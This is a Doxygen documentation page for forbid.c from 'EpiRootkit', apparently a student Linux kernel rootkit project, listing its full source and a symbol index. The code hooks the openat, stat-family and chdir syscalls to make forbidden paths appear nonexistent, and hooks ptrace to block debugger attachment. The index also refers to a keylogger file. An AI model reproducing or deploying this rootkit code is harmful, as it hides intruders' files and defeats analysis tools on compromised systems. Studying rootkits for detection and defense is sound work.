EpiRootkit
By STDBOOL
Loading...
Searching...
No Matches
forbid.c
Go to the documentation of this file.
1#include "forbid.h"
2
3#include "forbid_api.h"
4
5asmlinkage long (*__orig_openat)(const struct pt_regs *) = NULL;
6asmlinkage long (*__orig_newfstatat)(const struct pt_regs *) = NULL;
7asmlinkage long (*__orig_lstat)(const struct pt_regs *) = NULL;
8asmlinkage long (*__orig_fstat)(const struct pt_regs *) = NULL;
9asmlinkage long (*__orig_stat)(const struct pt_regs *) = NULL;
10asmlinkage long (*__orig_chdir)(const struct pt_regs *regs) = NULL;
11asmlinkage long (*__orig_ptrace)(const struct pt_regs *regs) = NULL;
12
13asmlinkage long notrace openat_hook(const struct pt_regs *regs) {
14 const char __user *u_path = (const char __user *)regs->si;
15 if (forbid_contains(u_path))
16 return -ENOENT;
17 return __orig_openat(regs);
18}
19
20asmlinkage long notrace stat_hook(const struct pt_regs *regs) {
21 const char __user *u_path = NULL;
22
23 switch ((int)regs->orig_ax) {
24 case __NR_stat:
25 case __NR_lstat:
26 u_path = (const char __user *)regs->di;
27 break;
28 case __NR_newfstatat:
29 u_path = (const char __user *)regs->si;
30 break;
31 case __NR_fstat:
32 int fd = (int)regs->di;
33 struct file *filp = fget(fd);
34
35 // Not sure, but seems to work
36 if (filp) {
37 struct path p = filp->f_path;
38 path_get(&p);
39 char buf_path[512];
40 char *full = d_path(&p, buf_path, sizeof(buf_path));
41 path_put(&p);
42 if (full && forbid_contains_str(full)) {
43 fput(filp);
44 return -ENOENT;
45 }
46 }
47 fput(filp);
48 return __orig_fstat(regs);
49 }
50
51 if (forbid_contains(u_path))
52 return -ENOENT;
53
54 switch ((int)regs->orig_ax) {
55 case __NR_stat:
56 return __orig_stat(regs);
57 case __NR_lstat:
58 return __orig_lstat(regs);
59 case __NR_newfstatat:
60 return __orig_newfstatat(regs);
61 default:
62 return -ENOENT;
63 }
64}
65
66asmlinkage long notrace chdir_hook(const struct pt_regs *regs) {
67 const char __user *u_path = (const char __user *)regs->di;
68 if (forbid_contains(u_path))
69 return -ENOENT;
70 return __orig_chdir(regs);
71}
72
73asmlinkage void notrace ptrace_hook(struct pt_regs *regs) {
74 long request = regs->di;
75
76 // Check pid for special processes ? Don't know if this function is very
77 // useful... pid_t pid = regs->si;
78
79 if (request == PTRACE_ATTACH || request == PTRACE_TRACEME || request == PTRACE_DETACH) {
80 regs->ax = -EPERM;
81 }
82 else {
83 regs->ax = __orig_ptrace(regs);
84 }
85}
file
static struct dentry * file
Definition epikeylog.c:145
__orig_chdir
asmlinkage long(* __orig_chdir)(const struct pt_regs *regs)
Definition forbid.c:10
ptrace_hook
asmlinkage void notrace ptrace_hook(struct pt_regs *regs)
Definition forbid.c:73
chdir_hook
asmlinkage long notrace chdir_hook(const struct pt_regs *regs)
Definition forbid.c:66
__orig_openat
asmlinkage long(* __orig_openat)(const struct pt_regs *)
Definition forbid.c:5
__orig_lstat
asmlinkage long(* __orig_lstat)(const struct pt_regs *)
Definition forbid.c:7
__orig_ptrace
asmlinkage long(* __orig_ptrace)(const struct pt_regs *regs)
Definition forbid.c:11
__orig_newfstatat
asmlinkage long(* __orig_newfstatat)(const struct pt_regs *)
Definition forbid.c:6
stat_hook
asmlinkage long notrace stat_hook(const struct pt_regs *regs)
Definition forbid.c:20
__orig_fstat
asmlinkage long(* __orig_fstat)(const struct pt_regs *)
Definition forbid.c:8
__orig_stat
asmlinkage long(* __orig_stat)(const struct pt_regs *)
Definition forbid.c:9
openat_hook
asmlinkage long notrace openat_hook(const struct pt_regs *regs)
Definition forbid.c:13
forbid_contains
int forbid_contains(const char __user *u_path)
Definition forbid_api.c:81
forbid_contains_str
int forbid_contains_str(const char *k_path)
Definition forbid_api.c:102
forbid_api.h